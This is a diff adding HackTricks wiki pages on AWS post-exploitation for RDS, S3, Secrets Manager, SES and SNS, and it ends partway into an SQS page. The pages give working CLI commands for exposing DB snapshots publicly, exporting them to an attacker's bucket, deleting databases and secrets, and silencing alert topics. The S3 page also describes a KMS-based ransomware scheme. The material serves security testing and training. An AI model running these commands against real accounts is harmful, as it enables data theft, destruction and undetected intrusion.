+{% content-ref url="../aws-services/aws-lightsail-enum.md" %}
+[aws-lightsail-enum.md](../aws-services/aws-lightsail-enum.md)
+{% endcontent-ref %}
+
+### Restore old DB snapshots
+
+If the DB is having snapshots, you might be able to **find sensitive information currently deleted in old snapshots**. **Restore** the snapshot in a **new database** and check it.
+
+### Restore Instance Snapshots
+
+Instance snapshots might contain **sensitive information** of already deleted instances or sensitive info that is deleted in the current instance. **Create new instances from the snapshots** and check them.\
+Or **export the snapshot to an AMI in EC2** and follow the steps of a typical EC2 instance.
+
+### Access Sensitive Information
+
+Check out the Lightsail privesc options to learn different ways to access potential sensitive information:
+
+{% content-ref url="../aws-privilege-escalation/aws-lightsail-privesc.md" %}
+[aws-lightsail-privesc.md](../aws-privilege-escalation/aws-lightsail-privesc.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md
new file mode 100644
index 0000000000..9bd9c70bb1
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md
@@ -0,0 +1,47 @@
+# AWS - Organizations Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Organizations
+
+For more info about AWS Organizations check:
+
+{% content-ref url="../aws-services/aws-organizations-enum.md" %}
+[aws-organizations-enum.md](../aws-services/aws-organizations-enum.md)
+{% endcontent-ref %}
+
+### Leave the Org
+
+{% code overflow="wrap" %}
+```bash
+aws organizations deregister-account --account-id <account_id> --region <region>
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md
new file mode 100644
index 0000000000..1e45f292dc
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md
@@ -0,0 +1,127 @@
+# AWS - RDS Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## RDS
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %}
+[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md)
+{% endcontent-ref %}
+
+### `rds:CreateDBSnapshot`, `rds:RestoreDBInstanceFromDBSnapshot`, `rds:ModifyDBInstance`
+
+If the attacker has enough permissions, he could make a **DB publicly accessible** by creating a snapshot of the DB, and then a publicly accessible DB from the snapshot.
+
+```bash
+aws rds describe-db-instances # Get DB identifier
+
+aws rds create-db-snapshot \
+    --db-instance-identifier <db-id> \
+    --db-snapshot-identifier cloudgoat
+
+# Get subnet groups & security groups
+aws rds describe-db-subnet-groups
+aws ec2 describe-security-groups
+
+aws rds restore-db-instance-from-db-snapshot \
+    --db-instance-identifier "new-db-not-malicious" \
+    --db-snapshot-identifier <scapshotId> \
+    --db-subnet-group-name <db subnet group> \
+    --publicly-accessible \
+    --vpc-security-group-ids <ec2-security group>
+
+aws rds modify-db-instance \
+    --db-instance-identifier "new-db-not-malicious" \
+    --master-user-password 'Llaody2f6.123' \
+    --apply-immediately
+
+# Connect to the new DB after a few mins
+```
+
+### `rds:ModifyDBSnapshotAttribute`, `rds:CreateDBSnapshot`
+
+An attacker with these permissions could **create an snapshot of a DB** and make it **publicly** **available**. Then, he could just create in his own account a DB from that snapshot.
+
+If the attacker **doesn't have the `rds:CreateDBSnapshot`**, he still could make **other** created snapshots **public**.
+
+{% code overflow="wrap" %}
+```bash
+# create snapshot
+aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>
+
+# Make it public/share with attackers account
+aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
+## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
+```
+{% endcode %}
+
+### `rds:DownloadDBLogFilePortion`
+
+An attacker with the `rds:DownloadDBLogFilePortion` permission can **download portions of an RDS instance's log files**. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate their privileges or perform unauthorized actions.
+
+{% code overflow="wrap" %}
+```bash
+aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text
+```
+{% endcode %}
+
+**Potential Impact**: Access to sensitive information or unauthorized actions using leaked credentials.
+
+### `rds:DeleteDBInstance`
+
+An attacker with these permissions can **DoS existing RDS instances**.
+
+{% code overflow="wrap" %}
+```bash
+# Delete
+aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot
+```
+{% endcode %}
+
+**Potential impact**: Deletion of existing RDS instances, and potential loss of data.
+
+### `rds:StartExportTask`
+
+{% hint style="info" %}
+TODO: Test
+{% endhint %}
+
+An attacker with this permission can **export an RDS instance snapshot to an S3 bucket**. If the attacker has control over the destination S3 bucket, they can potentially access sensitive data within the exported snapshot.
+
+{% code overflow="wrap" %}
+```bash
+aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id
+```
+{% endcode %}
+
+**Potential impact**: Access to sensitive data in the exported snapshot.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md
new file mode 100644
index 0000000000..ba908badb5
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md
@@ -0,0 +1,64 @@
+# AWS - S3 Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## S3
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-s3-athena-and-glacier-enum.md" %}
+[aws-s3-athena-and-glacier-enum.md](../aws-services/aws-s3-athena-and-glacier-enum.md)
+{% endcontent-ref %}
+
+### Sensitive Information
+
+Sometimes you will be able to find sensitive information in readable in the buckets. For example, terraform state secrets.
+
+### Pivoting
+
+Different platforms could be using S3 to store sensitive assets.\
+For example, **airflow** could be storing **DAGs** **code** in there, or **web pages** could be directly served from S3. An attacker with write permissions could **modify the code** from the bucket to **pivot** to other platforms, or **takeover accounts** modifying JS files.
+
+### S3 Ransomware
+
+In this scenario, the **attacker creates a KMS (Key Management Service) key in their own AWS account** or another compromised account. They then make this **key accessible to anyone in the world**, allowing any AWS user, role, or account to encrypt objects using this key. However, the objects cannot be decrypted.
+
+The attacker identifies a target **S3 bucket and gains write-level access** to it using various methods. This could be due to poor bucket configuration that exposes it publicly or the attacker gaining access to the AWS environment itself. The attacker typically targets buckets that contain sensitive information such as personally identifiable information (PII), protected health information (PHI), logs, backups, and more.
+
+To determine if the bucket can be targeted for ransomware, the attacker checks its configuration. This includes verifying if **S3 Object Versioning** is enabled and if **multi-factor authentication delete (MFA delete) is enabled**. If Object Versioning is not enabled, the attacker can proceed. If Object Versioning is enabled but MFA delete is disabled, the attacker can **disable Object Versioning**. If both Object Versioning and MFA delete are enabled, it becomes more difficult for the attacker to ransomware that specific bucket.
+
+Using the AWS API, the attacker **replaces each object in the bucket with an encrypted copy using their KMS key**. This effectively encrypts the data in the bucket, making it inaccessible without the key.
+
+To add further pressure, the attacker schedules the deletion of the KMS key used in the attack. This gives the target a 7-day window to recover their data before the key is deleted and the data becomes permanently lost.
+
+Finally, the attacker could upload a final file, usually named "ransom-note.txt," which contains instructions for the target on how to retrieve their files. This file is uploaded without encryption, likely to catch the target's attention and make them aware of the ransomware attack.
+
+**For more info** [**check the original research**](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)**.**
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md
new file mode 100644
index 0000000000..cc0591b88b
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md
@@ -0,0 +1,76 @@
+# AWS - Secrets Manager Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Secrets Manager
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %}
+[aws-secrets-manager-enum.md](../aws-services/aws-secrets-manager-enum.md)
+{% endcontent-ref %}
+
+### Read Secrets
+
+The **secrets themself are sensitive information**, [check the privesc page](../aws-privilege-escalation/aws-secrets-manager-privesc.md) to learn how to read them.
+
+### DoS Change Secret Value
+
+Changing the value of the secret you could **DoS all the system that depends on that value.**
+
+{% hint style="warning" %}
+Note that previous values are also stored, so it's easy to just go back to the previous value.
+{% endhint %}
+
+```bash
+# Requires permission secretsmanager:PutSecretValue
+aws secretsmanager put-secret-value \
+    --secret-id MyTestSecret \
+    --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"
+```
+
+### DoS Change KMS key
+
+```bash
+aws secretsmanager update-secret \
+    --secret-id MyTestSecret \
+    --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE
+```
+
+### DoS Deleting Secret
+
+The minimum number of days to delete a secret are 7
+
+```bash
+aws secretsmanager delete-secret \
+    --secret-id MyTestSecret \
+    --recovery-window-in-days 7
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md
new file mode 100644
index 0000000000..6e41ef5861
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md
@@ -0,0 +1,117 @@
+# AWS - SES Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## SES
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-ses-enum.md" %}
+[aws-ses-enum.md](../aws-services/aws-ses-enum.md)
+{% endcontent-ref %}
+
+### `ses:SendEmail`
+
+Send an email.
+
+{% code overflow="wrap" %}
+```bash
+aws ses send-email --from sender@example.com --destination file://emails.json --message file://message.json
+aws sesv2 send-email --from sender@example.com --destination file://emails.json --message file://message.json
+```
+{% endcode %}
+
+Still to test.
+
+### `ses:SendRawEmail`
+
+Send an email.
+
+```bash
+aws ses send-raw-email --raw-message file://message.json
+```
+
+Still to test.
+
+### `ses:SendTemplatedEmail`
+
+Send an email based on a template.
+
+{% code overflow="wrap" %}
+```bash
+aws ses  send-templated-email --source <value> --destination <value> --template <value>
+```
+{% endcode %}
+
+Still to test.
+
+### `ses:SendBulkTemplatedEmail`
+
+Send an email to multiple destinations
+
+```bash
+aws ses send-bulk-templated-email --source <value> --template <value>
+```
+
+Still to test.
+
+### `ses:SendBulkEmail`
+
+Send an email to multiple destinations.
+
+```
+aws sesv2 send-bulk-email --default-content <value> --bulk-email-entries <value>
+```
+
+### `ses:SendBounce`
+
+Send a **bounce email** over a received email (indicating that the email couldn't be received). This can only be done **up to 24h after receiving** the email.
+
+{% code overflow="wrap" %}
+```bash
+aws ses send-bounce --original-message-id <value> --bounce-sender <value> --bounced-recipient-info-list <value>
+```
+{% endcode %}
+
+Still to test.
+
+### `ses:SendCustomVerificationEmail`
+
+This will send a customized verification email. You might need permissions also to created the template email.
+
+{% code overflow="wrap" %}
+```bash
+aws ses send-custom-verification-email --email-address <value> --template-name <value>
+aws sesv2 send-custom-verification-email --email-address <value> --template-name <value>
+```
+{% endcode %}
+
+Still to test.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md
new file mode 100644
index 0000000000..7492acfd1e
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md
@@ -0,0 +1,112 @@
+# AWS - SNS Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## SNS
+
+For more information:
+
+{% content-ref url="../aws-services/aws-sns-enum.md" %}
+[aws-sns-enum.md](../aws-services/aws-sns-enum.md)
+{% endcontent-ref %}
+
+### Disrupt Messages
+
+In several cases, SNS topics are used to send messages to platforms that are being monitored (emails, slack messages...). If an attacker prevents sending the messages that alert about it presence in the cloud, he could remain undetected.
+
+### `sns:DeleteTopic`
+
+An attacker could delete an entire SNS topic, causing message loss and impacting applications relying on the topic.
+
+```bash
+aws sns delete-topic --topic-arn <value>
+```
+
+**Potential Impact**: Message loss and service disruption for applications using the deleted topic.
+
+### `sns:Publish`
+
+An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources.
+
+```bash
+aws sns publish --topic-arn <value> --message <value>
+```
+
+**Potential Impact**: Data corruption, unintended actions, or resource exhaustion.
+
+### `sns:SetTopicAttributes`
+
+An attacker could modify the attributes of an SNS topic, potentially affecting its performance, security, or availability.
+
+{% code overflow="wrap" %}
+```bash
+aws sns set-topic-attributes --topic-arn <value> --attribute-name <value> --attribute-value <value>
+```
+{% endcode %}
+
+**Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability.
+
+### `sns:Subscribe` , `sns:Unsubscribe`
+
+An attacker could subscribe or unsubscribe to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic.
+
+{% code overflow="wrap" %}
+```bash
+aws sns subscribe --topic-arn <value> --protocol <value> --endpoint <value>
+aws sns unsubscribe --subscription-arn <value>
+```
+{% endcode %}
+
+**Potential Impact**: Unauthorized access to messages, service disruption for applications relying on the affected topic.
+
+### `sns:AddPermission` , `sns:RemovePermission`
+
+An attacker could grant unauthorized users or services access to an SNS topic, or revoke permissions for legitimate users, causing disruptions in the normal functioning of applications that rely on the topic.
+
+```css
+aws sns add-permission --topic-arn <value> --label <value> --aws-account-id <value> --action-name <value>
+aws sns remove-permission --topic-arn <value> --label <value>
+```
+
+**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic.
+
+### `sns:TagResource` , `sns:UntagResource`
+
+An attacker could add, modify, or remove tags from SNS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
+
+{% code overflow="wrap" %}
+```bash
+aws sns tag-resource --resource-arn <value> --tags Key=<key>,Value=<value>
+aws sns untag-resource --resource-arn <value> --tag-keys <key>
+```
+{% endcode %}
+
+**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md
new file mode 100644
index 0000000000..09584ee404
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md
@@ -0,0 +1,113 @@
+# AWS - SQS Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
